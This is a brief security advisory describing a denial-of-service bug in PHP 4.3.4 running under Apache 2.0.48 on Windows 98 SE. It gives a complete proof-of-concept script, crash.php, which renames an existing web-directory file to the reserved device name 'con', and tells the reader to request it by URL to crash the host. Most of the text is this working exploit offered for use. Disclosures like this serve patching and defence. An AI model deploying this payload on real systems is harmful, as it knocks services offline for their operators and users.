DoS Vulnerability with php and "con" Bug

Tested on:
Windows 98 SE
Apache 2.0.48
php 4.3.4

Create the following file on your Webserver:

crash.php
#####################
<?
rename (file , con);
?>
#####################

"file" is an existing file in your webdirectory.


And then type in the following URL:

http://targethost/crash.php

The system will crash.

Zero X, member of www.lobnan.de and www.lostkey.org